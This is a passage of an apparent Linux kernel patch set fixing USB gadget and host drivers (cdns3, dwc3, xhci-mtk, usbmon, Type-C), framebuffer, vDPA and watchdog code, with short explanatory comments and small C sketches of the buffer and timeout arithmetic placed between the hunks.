+@@ -1248,7 +1297,7 @@ static int cdns3_ep_run_transfer(struct cdns3_endpoint *priv_ep,
+ 		if (sg_supported) {
+ 			trb->control |= cpu_to_le32(TRB_ISP);
+ 			/* Don't set chain bit for last TRB */
+-			if (sg_iter < num_trb - 1)
++			if ((sg_iter % num_trb_req) < num_trb_req - 1)
+ 				trb->control |= cpu_to_le32(TRB_CHAIN);
+ 
+ 			s = sg_next(s);
+@@ -1506,6 +1555,12 @@ static void cdns3_transfer_completed(struct cdns3_device *priv_dev,
+ 
+ 		/* The TRB was changed as link TRB, and the request was handled at ep_dequeue */
+ 		while (TRB_FIELD_TO_TYPE(le32_to_cpu(trb->control)) == TRB_LINK) {
++
++			/* ISO ep_traddr may stop at LINK TRB */
++			if (priv_ep->dequeue == cdns3_get_dma_pos(priv_dev, priv_ep) &&
++			    priv_ep->type == USB_ENDPOINT_XFER_ISOC)
++				break;
++
+ 			trace_cdns3_complete_trb(priv_ep, trb);
+ 			cdns3_ep_inc_deq(priv_ep);
+ 			trb = priv_ep->trb_pool + priv_ep->dequeue;
+@@ -1538,6 +1593,10 @@ static void cdns3_transfer_completed(struct cdns3_device *priv_dev,
+ 			}
+ 
+ 			if (request_handled) {
++				/* TRBs are duplicated priv_ep->interval times for ISO IN */
++				if (priv_ep->type == USB_ENDPOINT_XFER_ISOC && priv_ep->dir)
++					request->actual /= priv_ep->interval;
++
+ 				cdns3_gadget_giveback(priv_ep, priv_req, 0);
+ 				request_handled = false;
+ 				transfer_end = false;
+@@ -2033,11 +2092,10 @@ int cdns3_ep_config(struct cdns3_endpoint *priv_ep, bool enable)
+ 	bool is_iso_ep = (priv_ep->type == USB_ENDPOINT_XFER_ISOC);
+ 	struct cdns3_device *priv_dev = priv_ep->cdns3_dev;
+ 	u32 bEndpointAddress = priv_ep->num | priv_ep->dir;
+-	u32 max_packet_size = 0;
+-	u8 maxburst = 0;
++	u32 max_packet_size = priv_ep->wMaxPacketSize;
++	u8 maxburst = priv_ep->bMaxBurst;
+ 	u32 ep_cfg = 0;
+ 	u8 buffering;
+-	u8 mult = 0;
+ 	int ret;
+ 
+ 	buffering = priv_dev->ep_buf_size - 1;
+@@ -2059,8 +2117,7 @@ int cdns3_ep_config(struct cdns3_endpoint *priv_ep, bool enable)
+ 		break;
+ 	default:
+ 		ep_cfg = EP_CFG_EPTYPE(USB_ENDPOINT_XFER_ISOC);
+-		mult = priv_dev->ep_iso_burst - 1;
+-		buffering = mult + 1;
++		buffering = (priv_ep->bMaxBurst + 1) * (priv_ep->mult + 1) - 1;
+ 	}
+ 
+ 	switch (priv_dev->gadget.speed) {
+@@ -2071,17 +2128,8 @@ int cdns3_ep_config(struct cdns3_endpoint *priv_ep, bool enable)
+ 		max_packet_size = is_iso_ep ? 1024 : 512;
+ 		break;
+ 	case USB_SPEED_SUPER:
+-		/* It's limitation that driver assumes in driver. */
+-		mult = 0;
+-		max_packet_size = 1024;
+-		if (priv_ep->type == USB_ENDPOINT_XFER_ISOC) {
+-			maxburst = priv_dev->ep_iso_burst - 1;
+-			buffering = (mult + 1) *
+-				    (maxburst + 1);
+-
+-			if (priv_ep->interval > 1)
+-				buffering++;
+-		} else {
++		if (priv_ep->type != USB_ENDPOINT_XFER_ISOC) {
++			max_packet_size = 1024;
+ 			maxburst = priv_dev->ep_buf_size - 1;
+ 		}
+ 		break;
+@@ -2110,7 +2158,6 @@ int cdns3_ep_config(struct cdns3_endpoint *priv_ep, bool enable)
+ 	if (priv_dev->dev_ver < DEV_VER_V2)
+ 		priv_ep->trb_burst_size = 16;
+ 
+-	mult = min_t(u8, mult, EP_CFG_MULT_MAX);
+ 	buffering = min_t(u8, buffering, EP_CFG_BUFFERING_MAX);
+ 	maxburst = min_t(u8, maxburst, EP_CFG_MAXBURST_MAX);
+ 
+@@ -2144,7 +2191,7 @@ int cdns3_ep_config(struct cdns3_endpoint *priv_ep, bool enable)
+ 	}
+ 
+ 	ep_cfg |= EP_CFG_MAXPKTSIZE(max_packet_size) |
+-		  EP_CFG_MULT(mult) |
++		  EP_CFG_MULT(priv_ep->mult) |			/* must match EP setting */
+ 		  EP_CFG_BUFFERING(buffering) |
+ 		  EP_CFG_MAXBURST(maxburst);
+ 
+@@ -2234,6 +2281,13 @@ usb_ep *cdns3_gadget_match_ep(struct usb_gadget *gadget,
+ 	priv_ep->type = usb_endpoint_type(desc);
+ 	priv_ep->flags |= EP_CLAIMED;
+ 	priv_ep->interval = desc->bInterval ? BIT(desc->bInterval - 1) : 0;
++	priv_ep->wMaxPacketSize =  usb_endpoint_maxp(desc);
++	priv_ep->mult = USB_EP_MAXP_MULT(priv_ep->wMaxPacketSize);
++	priv_ep->wMaxPacketSize &= USB_ENDPOINT_MAXP_MASK;
++	if (priv_ep->type == USB_ENDPOINT_XFER_ISOC && comp_desc) {
++		priv_ep->mult =  USB_SS_MULT(comp_desc->bmAttributes) - 1;
++		priv_ep->bMaxBurst = comp_desc->bMaxBurst;
++	}
+ 
+ 	spin_unlock_irqrestore(&priv_dev->lock, flags);
+ 	return &priv_ep->endpoint;
+@@ -3015,22 +3069,40 @@ static int cdns3_gadget_check_config(struct usb_gadget *gadget)
+ 	struct cdns3_endpoint *priv_ep;
+ 	struct usb_ep *ep;
+ 	int n_in = 0;
++	int iso = 0;
++	int out = 1;
+ 	int total;
++	int n;
+ 
+ 	list_for_each_entry(ep, &gadget->ep_list, ep_list) {
+ 		priv_ep = ep_to_cdns3_ep(ep);
+-		if ((priv_ep->flags & EP_CLAIMED) && (ep->address & USB_DIR_IN))
+-			n_in++;
++		if (!(priv_ep->flags & EP_CLAIMED))
++			continue;
++
++		n = (priv_ep->mult + 1) * (priv_ep->bMaxBurst + 1);
++		if (ep->address & USB_DIR_IN) {
++			/*
++			 * ISO transfer: the DMA starts moving data when an ISO token
++			 * arrives and only transfers min(TD size, iso), so there is
++			 * no benefit in allocating more internal memory than 'iso'.
++			 */
++			if (priv_ep->type == USB_ENDPOINT_XFER_ISOC)
++				iso += n;
++			else
++				n_in++;
++		} else {
++			if (priv_ep->type == USB_ENDPOINT_XFER_ISOC)
++				out = max_t(int, out, n);
++		}
+ 	}
+ 
+ 	/* 2KB are reserved for EP0, 1KB for out*/
+-	total = 2 + n_in + 1;
++	total = 2 + n_in + out + iso;
+ 
+ 	if (total > priv_dev->onchip_buffers)
+ 		return -ENOMEM;
+ 
+-	priv_dev->ep_buf_size = priv_dev->ep_iso_burst =
+-			(priv_dev->onchip_buffers - 2) / (n_in + 1);
++	priv_dev->ep_buf_size = (priv_dev->onchip_buffers - 2 - iso) / (n_in + out);
+ 
+ 	return 0;
+ }
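
The new buffer accounting in cdns3_gadget_check_config() sizes the on-chip memory as 2 KB for EP0, 1 KB per non-ISO IN endpoint, the largest ISO OUT requirement, and the sum of all ISO IN requirements, where each ISO endpoint needs (mult + 1) * (bMaxBurst + 1) KB. A standalone sketch of that arithmetic; the struct and endpoint list are invented for illustration:

#include <stdbool.h>
#include <stdio.h>

/* Invented endpoint description, for illustration only */
struct ep {
	bool claimed, is_in, is_iso;
	unsigned int mult, max_burst;
};

static unsigned int budget_kb(const struct ep *eps, int n_eps)
{
	unsigned int n_in = 0, iso = 0, out = 1;	/* 1 KB reserved for OUT */

	for (int i = 0; i < n_eps; i++) {
		unsigned int n = (eps[i].mult + 1) * (eps[i].max_burst + 1);

		if (!eps[i].claimed)
			continue;
		if (eps[i].is_in) {
			if (eps[i].is_iso)
				iso += n;	/* every ISO IN EP needs its own buffer */
			else
				n_in++;		/* 1 KB per non-ISO IN EP */
		} else if (eps[i].is_iso && n > out) {
			out = n;		/* OUT EPs share the largest ISO need */
		}
	}
	return 2 + n_in + out + iso;		/* 2 KB for EP0; must fit onchip_buffers */
}

int main(void)
{
	struct ep eps[] = {
		{ true, true,  false, 0, 0 },	/* bulk IN:  1 KB */
		{ true, true,  true,  1, 2 },	/* ISO IN:   6 KB */
		{ true, false, true,  0, 3 },	/* ISO OUT:  4 KB */
	};

	printf("%u KB\n", budget_kb(eps, 3));	/* 2 + 1 + 4 + 6 = 13 */
	return 0;
}
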
+diff --git a/drivers/usb/cdns3/cdns3-gadget.h b/drivers/usb/cdns3/cdns3-gadget.h
+index fbe4a8e3aa897..086a7bb838975 100644
+--- a/drivers/usb/cdns3/cdns3-gadget.h
++++ b/drivers/usb/cdns3/cdns3-gadget.h
+@@ -1168,6 +1168,9 @@ struct cdns3_endpoint {
+ 	u8			dir;
+ 	u8			num;
+ 	u8			type;
++	u8			mult;
++	u8			bMaxBurst;
++	u16			wMaxPacketSize;
+ 	int			interval;
+ 
+ 	int			free_trbs;
+diff --git a/drivers/usb/chipidea/core.c b/drivers/usb/chipidea/core.c
+index b9227f41cf1c0..763d6858a8e6f 100644
+--- a/drivers/usb/chipidea/core.c
++++ b/drivers/usb/chipidea/core.c
+@@ -523,6 +523,13 @@ static irqreturn_t ci_irq_handler(int irq, void *data)
+ 	u32 otgsc = 0;
+ 
+ 	if (ci->in_lpm) {
++		/*
++		 * If a wakeup irq is already pending, just return and
++		 * wait for the resume to finish first.
++		 */
++		if (ci->wakeup_int)
++			return IRQ_HANDLED;
++
+ 		disable_irq_nosync(irq);
+ 		ci->wakeup_int = true;
+ 		pm_runtime_get(ci->dev);
+diff --git a/drivers/usb/class/cdc-acm.c b/drivers/usb/class/cdc-acm.c
+index 36bf051b345b8..2a7eea4e251a1 100644
+--- a/drivers/usb/class/cdc-acm.c
++++ b/drivers/usb/class/cdc-acm.c
+@@ -892,6 +892,9 @@ static int acm_tty_break_ctl(struct tty_struct *tty, int state)
+ 	struct acm *acm = tty->driver_data;
+ 	int retval;
+ 
++	if (!(acm->ctrl_caps & USB_CDC_CAP_BRK))
++		return -EOPNOTSUPP;
++
+ 	retval = acm_send_break(acm, state ? 0xffff : 0);
+ 	if (retval < 0)
+ 		dev_dbg(&acm->control->dev,
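
This capability check pairs with the send_break() rework in tty_io.c above: a device without USB_CDC_CAP_BRK now reports -EOPNOTSUPP, and for drivers without TTY_DRIVER_HARDWARE_BREAK the tty core maps that return from the initial break_ctl(-1) probe to success instead of failing the ioctl.
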
+diff --git a/drivers/usb/dwc3/core.c b/drivers/usb/dwc3/core.c
+index 1f23c96fa94f8..011a3909f9ad1 100644
+--- a/drivers/usb/dwc3/core.c
++++ b/drivers/usb/dwc3/core.c
+@@ -277,48 +277,11 @@ int dwc3_core_soft_reset(struct dwc3 *dwc)
+ 	/*
+ 	 * We're resetting only the device side because, if we're in host mode,
+ 	 * XHCI driver will reset the host block. If dwc3 was configured for
+-	 * host-only mode or current role is host, then we can return early.
++	 * host-only mode, then we can return early.
+ 	 */
+ 	if (dwc->current_dr_role == DWC3_GCTL_PRTCAP_HOST)
+ 		return 0;
+ 
+-	/*
+-	 * If the dr_mode is host and the dwc->current_dr_role is not the
+-	 * corresponding DWC3_GCTL_PRTCAP_HOST, then the dwc3_core_init_mode
+-	 * isn't executed yet. Ensure the phy is ready before the controller
+-	 * updates the GCTL.PRTCAPDIR or other settings by soft-resetting
+-	 * the phy.
+-	 *
+-	 * Note: GUSB3PIPECTL[n] and GUSB2PHYCFG[n] are port settings where n
+-	 * is port index. If this is a multiport host, then we need to reset
+-	 * all active ports.
+-	 */
+-	if (dwc->dr_mode == USB_DR_MODE_HOST) {
+-		u32 usb3_port;
+-		u32 usb2_port;
+-
+-		usb3_port = dwc3_readl(dwc->regs, DWC3_GUSB3PIPECTL(0));
+-		usb3_port |= DWC3_GUSB3PIPECTL_PHYSOFTRST;
+-		dwc3_writel(dwc->regs, DWC3_GUSB3PIPECTL(0), usb3_port);
+-
+-		usb2_port = dwc3_readl(dwc->regs, DWC3_GUSB2PHYCFG(0));
+-		usb2_port |= DWC3_GUSB2PHYCFG_PHYSOFTRST;
+-		dwc3_writel(dwc->regs, DWC3_GUSB2PHYCFG(0), usb2_port);
+-
+-		/* Small delay for phy reset assertion */
+-		usleep_range(1000, 2000);
+-
+-		usb3_port &= ~DWC3_GUSB3PIPECTL_PHYSOFTRST;
+-		dwc3_writel(dwc->regs, DWC3_GUSB3PIPECTL(0), usb3_port);
+-
+-		usb2_port &= ~DWC3_GUSB2PHYCFG_PHYSOFTRST;
+-		dwc3_writel(dwc->regs, DWC3_GUSB2PHYCFG(0), usb2_port);
+-
+-		/* Wait for clock synchronization */
+-		msleep(50);
+-		return 0;
+-	}
+-
+ 	reg = dwc3_readl(dwc->regs, DWC3_DCTL);
+ 	reg |= DWC3_DCTL_CSFTRST;
+ 	reg &= ~DWC3_DCTL_RUN_STOP;
+diff --git a/drivers/usb/dwc3/ep0.c b/drivers/usb/dwc3/ep0.c
+index 61de693461da4..ec3c33266547c 100644
+--- a/drivers/usb/dwc3/ep0.c
++++ b/drivers/usb/dwc3/ep0.c
+@@ -236,7 +236,10 @@ void dwc3_ep0_stall_and_restart(struct dwc3 *dwc)
+ 		struct dwc3_request	*req;
+ 
+ 		req = next_request(&dep->pending_list);
+-		dwc3_gadget_giveback(dep, req, -ECONNRESET);
++		if (!dwc->connected)
++			dwc3_gadget_giveback(dep, req, -ESHUTDOWN);
++		else
++			dwc3_gadget_giveback(dep, req, -ECONNRESET);
+ 	}
+ 
+ 	dwc->eps[0]->trb_enqueue = 0;
+diff --git a/drivers/usb/host/xhci-mtk.c b/drivers/usb/host/xhci-mtk.c
+index a0921687444b1..bb4f80627cdc3 100644
+--- a/drivers/usb/host/xhci-mtk.c
++++ b/drivers/usb/host/xhci-mtk.c
+@@ -7,6 +7,7 @@
+  *  Chunfeng Yun <chunfeng.yun@mediatek.com>
+  */
+ 
++#include <linux/bitfield.h>
+ #include <linux/dma-mapping.h>
+ #include <linux/iopoll.h>
+ #include <linux/kernel.h>
+@@ -73,6 +74,9 @@
+ #define FRMCNT_LEV1_RANG	(0x12b << 8)
+ #define FRMCNT_LEV1_RANG_MASK	GENMASK(19, 8)
+ 
++#define HSCH_CFG1		0x960
++#define SCH3_RXFIFO_DEPTH_MASK	GENMASK(21, 20)
++
+ #define SS_GEN2_EOF_CFG		0x990
+ #define SSG2EOF_OFFSET		0x3c
+ 
+@@ -114,6 +118,8 @@
+ #define SSC_IP_SLEEP_EN	BIT(4)
+ #define SSC_SPM_INT_EN		BIT(1)
+ 
++#define SCH_FIFO_TO_KB(x)	((x) >> 10)
++
+ enum ssusb_uwk_vers {
+ 	SSUSB_UWK_V1 = 1,
+ 	SSUSB_UWK_V2,
+@@ -165,6 +171,35 @@ static void xhci_mtk_set_frame_interval(struct xhci_hcd_mtk *mtk)
+ 	writel(value, hcd->regs + SS_GEN2_EOF_CFG);
+ }
+ 
++/*
++ * workaround: usb3.2 gen1 isoc rx hw issue
++ * The host sends out an unexpected ACK after the device finishes a burst
++ * transfer with a short packet.
++ */
++static void xhci_mtk_rxfifo_depth_set(struct xhci_hcd_mtk *mtk)
++{
++	struct usb_hcd *hcd = mtk->hcd;
++	u32 value;
++
++	if (!mtk->rxfifo_depth)
++		return;
++
++	value = readl(hcd->regs + HSCH_CFG1);
++	value &= ~SCH3_RXFIFO_DEPTH_MASK;
++	value |= FIELD_PREP(SCH3_RXFIFO_DEPTH_MASK,
++			    SCH_FIFO_TO_KB(mtk->rxfifo_depth) - 1);
++	writel(value, hcd->regs + HSCH_CFG1);
++}
++
++static void xhci_mtk_init_quirk(struct xhci_hcd_mtk *mtk)
++{
++	/* workaround only for mt8195 */
++	xhci_mtk_set_frame_interval(mtk);
++
++	/* workaround for SoCs using SSUSB IP versions before IPM v1.6.0 */
++	xhci_mtk_rxfifo_depth_set(mtk);
++}
++
+ static int xhci_mtk_host_enable(struct xhci_hcd_mtk *mtk)
+ {
+ 	struct mu3c_ippc_regs __iomem *ippc = mtk->ippc_regs;
+@@ -453,8 +488,7 @@ static int xhci_mtk_setup(struct usb_hcd *hcd)
+ 		if (ret)
+ 			return ret;
+ 
+-		/* workaround only for mt8195 */
+-		xhci_mtk_set_frame_interval(mtk);
++		xhci_mtk_init_quirk(mtk);
+ 	}
+ 
+ 	ret = xhci_gen_setup(hcd, xhci_mtk_quirks);
+@@ -531,6 +565,8 @@ static int xhci_mtk_probe(struct platform_device *pdev)
+ 	of_property_read_u32(node, "mediatek,u2p-dis-msk",
+ 			     &mtk->u2p_dis_msk);
+ 
++	of_property_read_u32(node, "rx-fifo-depth", &mtk->rxfifo_depth);
++
+ 	ret = usb_wakeup_of_property_parse(mtk, node);
+ 	if (ret) {
+ 		dev_err(dev, "failed to parse uwk property\n");
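
The DT-supplied "rx-fifo-depth" value is a byte count; it is converted to KB and the 2-bit field holds depth-in-KB minus one. A quick standalone check of the encoding, with the register layout taken from the hunk above and everything else illustrative:

#include <stdint.h>
#include <stdio.h>

#define SCH3_RXFIFO_DEPTH_SHIFT 20
#define SCH3_RXFIFO_DEPTH_MASK  (0x3u << SCH3_RXFIFO_DEPTH_SHIFT)	/* GENMASK(21, 20) */
#define SCH_FIFO_TO_KB(x)       ((x) >> 10)

static uint32_t encode_rxfifo(uint32_t reg, uint32_t depth_bytes)
{
	reg &= ~SCH3_RXFIFO_DEPTH_MASK;
	reg |= ((SCH_FIFO_TO_KB(depth_bytes) - 1) << SCH3_RXFIFO_DEPTH_SHIFT) &
	       SCH3_RXFIFO_DEPTH_MASK;		/* open-coded FIELD_PREP() */
	return reg;
}

int main(void)
{
	/* A 3 KB FIFO encodes as 2, i.e. bits [21:20] = 0b10 */
	printf("0x%08x\n", encode_rxfifo(0, 3072));
	return 0;
}
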
+diff --git a/drivers/usb/host/xhci-mtk.h b/drivers/usb/host/xhci-mtk.h
+index 1174a510dd388..2a6a47d0f09a4 100644
+--- a/drivers/usb/host/xhci-mtk.h
++++ b/drivers/usb/host/xhci-mtk.h
+@@ -160,6 +160,8 @@ struct xhci_hcd_mtk {
+ 	struct regmap *uwk;
+ 	u32 uwk_reg_base;
+ 	u32 uwk_vers;
++	/* quirk */
++	u32 rxfifo_depth;
+ };
+ 
+ static inline struct xhci_hcd_mtk *hcd_to_mtk(struct usb_hcd *hcd)
+diff --git a/drivers/usb/mon/mon_bin.c b/drivers/usb/mon/mon_bin.c
+index 094e812e9e692..35483217b1f6c 100644
+--- a/drivers/usb/mon/mon_bin.c
++++ b/drivers/usb/mon/mon_bin.c
+@@ -1247,14 +1247,19 @@ static vm_fault_t mon_bin_vma_fault(struct vm_fault *vmf)
+ 	struct mon_reader_bin *rp = vmf->vma->vm_private_data;
+ 	unsigned long offset, chunk_idx;
+ 	struct page *pageptr;
++	unsigned long flags;
+ 
++	spin_lock_irqsave(&rp->b_lock, flags);
+ 	offset = vmf->pgoff << PAGE_SHIFT;
+-	if (offset >= rp->b_size)
++	if (offset >= rp->b_size) {
++		spin_unlock_irqrestore(&rp->b_lock, flags);
+ 		return VM_FAULT_SIGBUS;
++	}
+ 	chunk_idx = offset / CHUNK_SIZE;
+ 	pageptr = rp->b_vec[chunk_idx].pg;
+ 	get_page(pageptr);
+ 	vmf->page = pageptr;
++	spin_unlock_irqrestore(&rp->b_lock, flags);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/usb/phy/phy-mxs-usb.c b/drivers/usb/phy/phy-mxs-usb.c
+index 9299df53eb9df..160c9264339f0 100644
+--- a/drivers/usb/phy/phy-mxs-usb.c
++++ b/drivers/usb/phy/phy-mxs-usb.c
+@@ -388,8 +388,7 @@ static void __mxs_phy_disconnect_line(struct mxs_phy *mxs_phy, bool disconnect)
+ 
+ static bool mxs_phy_is_otg_host(struct mxs_phy *mxs_phy)
+ {
+-	return IS_ENABLED(CONFIG_USB_OTG) &&
+-		mxs_phy->phy.last_event == USB_EVENT_ID;
++	return mxs_phy->phy.last_event == USB_EVENT_ID;
+ }
+ 
+ static void mxs_phy_disconnect_line(struct mxs_phy *mxs_phy, bool on)
+diff --git a/drivers/usb/typec/class.c b/drivers/usb/typec/class.c
+index 49d6b2388b874..3da404d5178d3 100644
+--- a/drivers/usb/typec/class.c
++++ b/drivers/usb/typec/class.c
+@@ -263,11 +263,13 @@ static void typec_altmode_put_partner(struct altmode *altmode)
+ {
+ 	struct altmode *partner = altmode->partner;
+ 	struct typec_altmode *adev;
++	struct typec_altmode *partner_adev;
+ 
+ 	if (!partner)
+ 		return;
+ 
+ 	adev = &altmode->adev;
++	partner_adev = &partner->adev;
+ 
+ 	if (is_typec_plug(adev->dev.parent)) {
+ 		struct typec_plug *plug = to_typec_plug(adev->dev.parent);
+@@ -276,7 +278,7 @@ static void typec_altmode_put_partner(struct altmode *altmode)
+ 	} else {
+ 		partner->partner = NULL;
+ 	}
+-	put_device(&adev->dev);
++	put_device(&partner_adev->dev);
+ }
+ 
+ /**
+diff --git a/drivers/vdpa/alibaba/eni_vdpa.c b/drivers/vdpa/alibaba/eni_vdpa.c
+index 5a09a09cca709..cce3d1837104c 100644
+--- a/drivers/vdpa/alibaba/eni_vdpa.c
++++ b/drivers/vdpa/alibaba/eni_vdpa.c
+@@ -497,7 +497,7 @@ static int eni_vdpa_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	if (!eni_vdpa->vring) {
+ 		ret = -ENOMEM;
+ 		ENI_ERR(pdev, "failed to allocate virtqueues\n");
+-		goto err;
++		goto err_remove_vp_legacy;
+ 	}
+ 
+ 	for (i = 0; i < eni_vdpa->queues; i++) {
+@@ -509,11 +509,13 @@ static int eni_vdpa_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	ret = vdpa_register_device(&eni_vdpa->vdpa, eni_vdpa->queues);
+ 	if (ret) {
+ 		ENI_ERR(pdev, "failed to register to vdpa bus\n");
+-		goto err;
++		goto err_remove_vp_legacy;
+ 	}
+ 
+ 	return 0;
+ 
++err_remove_vp_legacy:
++	vp_legacy_remove(&eni_vdpa->ldev);
+ err:
+ 	put_device(&eni_vdpa->vdpa.dev);
+ 	return ret;
+diff --git a/drivers/video/fbdev/core/fb_defio.c b/drivers/video/fbdev/core/fb_defio.c
+index a3cf1f764f29b..49883c8012e60 100644
+--- a/drivers/video/fbdev/core/fb_defio.c
++++ b/drivers/video/fbdev/core/fb_defio.c
+@@ -132,11 +132,7 @@ int fb_deferred_io_fsync(struct file *file, loff_t start, loff_t end, int datasy
+ 		return 0;
+ 
+ 	inode_lock(inode);
+-	/* Kill off the delayed work */
+-	cancel_delayed_work_sync(&info->deferred_work);
+-
+-	/* Run it immediately */
+-	schedule_delayed_work(&info->deferred_work, 0);
++	flush_delayed_work(&info->deferred_work);
+ 	inode_unlock(inode);
+ 
+ 	return 0;
+@@ -321,7 +317,7 @@ static void fb_deferred_io_lastclose(struct fb_info *info)
+ 	struct page *page;
+ 	int i;
+ 
+-	cancel_delayed_work_sync(&info->deferred_work);
++	flush_delayed_work(&info->deferred_work);
+ 
+ 	/* clear out the mapping that we setup */
+ 	for (i = 0 ; i < info->fix.smem_len; i += PAGE_SIZE) {
+diff --git a/drivers/video/fbdev/imxfb.c b/drivers/video/fbdev/imxfb.c
+index 36ada87b49a49..32b8374abeca5 100644
+--- a/drivers/video/fbdev/imxfb.c
++++ b/drivers/video/fbdev/imxfb.c
+@@ -42,6 +42,7 @@
+ #include <video/videomode.h>
+ 
+ #define PCR_TFT		(1 << 31)
++#define PCR_COLOR	(1 << 30)
+ #define PCR_BPIX_8	(3 << 25)
+ #define PCR_BPIX_12	(4 << 25)
+ #define PCR_BPIX_16	(5 << 25)
+@@ -150,6 +151,12 @@ enum imxfb_type {
+ 	IMX21_FB,
+ };
+ 
++enum imxfb_panel_type {
++	PANEL_TYPE_MONOCHROME,
++	PANEL_TYPE_CSTN,
++	PANEL_TYPE_TFT,
++};
++
+ struct imxfb_info {
+ 	struct platform_device  *pdev;
+ 	void __iomem		*regs;
+@@ -157,6 +164,7 @@ struct imxfb_info {
+ 	struct clk		*clk_ahb;
+ 	struct clk		*clk_per;
+ 	enum imxfb_type		devtype;
++	enum imxfb_panel_type	panel_type;
+ 	bool			enabled;
+ 
+ 	/*
+@@ -444,6 +452,13 @@ static int imxfb_check_var(struct fb_var_screeninfo *var, struct fb_info *info)
+ 	if (!is_imx1_fb(fbi) && imxfb_mode->aus_mode)
+ 		fbi->lauscr = LAUSCR_AUS_MODE;
+ 
++	if (imxfb_mode->pcr & PCR_TFT)
++		fbi->panel_type = PANEL_TYPE_TFT;
++	else if (imxfb_mode->pcr & PCR_COLOR)
++		fbi->panel_type = PANEL_TYPE_CSTN;
++	else
++		fbi->panel_type = PANEL_TYPE_MONOCHROME;
++
+ 	/*
+ 	 * Copy the RGB parameters for this display
+ 	 * from the machine specific parameters.
+@@ -598,6 +613,7 @@ static int imxfb_activate_var(struct fb_var_screeninfo *var, struct fb_info *inf
+ {
+ 	struct imxfb_info *fbi = info->par;
+ 	u32 ymax_mask = is_imx1_fb(fbi) ? YMAX_MASK_IMX1 : YMAX_MASK_IMX21;
++	u8 left_margin_low;
+ 
+ 	pr_debug("var: xres=%d hslen=%d lm=%d rm=%d\n",
+ 		var->xres, var->hsync_len,
+@@ -606,6 +622,13 @@ static int imxfb_activate_var(struct fb_var_screeninfo *var, struct fb_info *inf
+ 		var->yres, var->vsync_len,
+ 		var->upper_margin, var->lower_margin);
+ 
++	if (fbi->panel_type == PANEL_TYPE_TFT)
++		left_margin_low = 3;
++	else if (fbi->panel_type == PANEL_TYPE_CSTN)
++		left_margin_low = 2;
++	else
++		left_margin_low = 0;
++
+ #if DEBUG_VAR
+ 	if (var->xres < 16        || var->xres > 1024)
+ 		printk(KERN_ERR "%s: invalid xres %d\n",
+@@ -613,7 +636,7 @@ static int imxfb_activate_var(struct fb_var_screeninfo *var, struct fb_info *inf
+ 	if (var->hsync_len < 1    || var->hsync_len > 64)
+ 		printk(KERN_ERR "%s: invalid hsync_len %d\n",
+ 			info->fix.id, var->hsync_len);
+-	if (var->left_margin < 3  || var->left_margin > 255)
++	if (var->left_margin < left_margin_low  || var->left_margin > 255)
+ 		printk(KERN_ERR "%s: invalid left_margin %d\n",
+ 			info->fix.id, var->left_margin);
+ 	if (var->right_margin < 1 || var->right_margin > 255)
+@@ -639,7 +662,7 @@ static int imxfb_activate_var(struct fb_var_screeninfo *var, struct fb_info *inf
+ 
+ 	writel(HCR_H_WIDTH(var->hsync_len - 1) |
+ 		HCR_H_WAIT_1(var->right_margin - 1) |
+-		HCR_H_WAIT_2(var->left_margin - 3),
++		HCR_H_WAIT_2(var->left_margin - left_margin_low),
+ 		fbi->regs + LCDC_HCR);
+ 
+ 	writel(VCR_V_WIDTH(var->vsync_len) |
+diff --git a/drivers/watchdog/bcm2835_wdt.c b/drivers/watchdog/bcm2835_wdt.c
+index 94907176a0e4f..55c0f7b0e8fba 100644
+--- a/drivers/watchdog/bcm2835_wdt.c
++++ b/drivers/watchdog/bcm2835_wdt.c
+@@ -42,6 +42,7 @@
+ 
+ #define SECS_TO_WDOG_TICKS(x) ((x) << 16)
+ #define WDOG_TICKS_TO_SECS(x) ((x) >> 16)
++#define WDOG_TICKS_TO_MSECS(x) ((x) * 1000 >> 16)
+ 
+ struct bcm2835_wdt {
+ 	void __iomem		*base;
+@@ -140,7 +141,7 @@ static struct watchdog_device bcm2835_wdt_wdd = {
+ 	.info =		&bcm2835_wdt_info,
+ 	.ops =		&bcm2835_wdt_ops,
+ 	.min_timeout =	1,
+-	.max_timeout =	WDOG_TICKS_TO_SECS(PM_WDOG_TIME_SET),
++	.max_hw_heartbeat_ms =	WDOG_TICKS_TO_MSECS(PM_WDOG_TIME_SET),
+ 	.timeout =	WDOG_TICKS_TO_SECS(PM_WDOG_TIME_SET),
+ };
+ 
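
The switch from max_timeout to max_hw_heartbeat_ms matters because the counter is 16.16 fixed point: PM_WDOG_TIME_SET ticks come to just under 16 s, which truncates to 15 whole seconds but 15999 ms. A standalone check of the conversions; the PM_WDOG_TIME_SET value of 0x000fffff is assumed from the driver:

#include <stdio.h>

/* Value assumed from the driver; the counter is 20 bits of 16.16 ticks */
#define PM_WDOG_TIME_SET       0x000fffffu

#define WDOG_TICKS_TO_SECS(x)  ((x) >> 16)
#define WDOG_TICKS_TO_MSECS(x) ((x) * 1000 >> 16)

int main(void)
{
	unsigned long long t = PM_WDOG_TIME_SET;

	/* prints 15 s vs. 15999 ms: the ms form keeps ~1 s of real range */
	printf("%llu s, %llu ms\n",
	       (unsigned long long)WDOG_TICKS_TO_SECS(t),
	       (unsigned long long)WDOG_TICKS_TO_MSECS(t));
	return 0;
}

Advertising the limit in milliseconds also lets the watchdog core keep user timeouts longer than the hardware maximum alive by pinging the device on the user's behalf.
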
+diff --git a/drivers/watchdog/hpwdt.c b/drivers/watchdog/hpwdt.c
+index f79f932bca148..79ed1626d8ea1 100644
+--- a/drivers/watchdog/hpwdt.c
++++ b/drivers/watchdog/hpwdt.c
+@@ -178,7 +178,7 @@ static int hpwdt_pretimeout(unsigned int ulReason, struct pt_regs *regs)
+ 		"3. OA Forward Progress Log\n"
+ 		"4. iLO Event Log";
+ 
+-	if (ilo5 && ulReason == NMI_UNKNOWN && !mynmi)
++	if (ulReason == NMI_UNKNOWN && !mynmi)
+ 		return NMI_DONE;
+ 
+ 	if (ilo5 && !pretimeout && !mynmi)
+diff --git a/drivers/watchdog/rti_wdt.c b/drivers/watchdog/rti_wdt.c
+index 6e9253761fc10..ea617c0f97470 100644
+--- a/drivers/watchdog/rti_wdt.c
++++ b/drivers/watchdog/rti_wdt.c
+@@ -70,6 +70,11 @@ static int rti_wdt_start(struct watchdog_device *wdd)
+ {
+ 	u32 timer_margin;
+ 	struct rti_wdt_device *wdt = watchdog_get_drvdata(wdd);
++	int ret;
++
++	ret = pm_runtime_resume_and_get(wdd->parent);
++	if (ret)
++		return ret;
+ 
+ 	/* set timeout period */
+ 	timer_margin = (u64)wdd->timeout * wdt->freq;
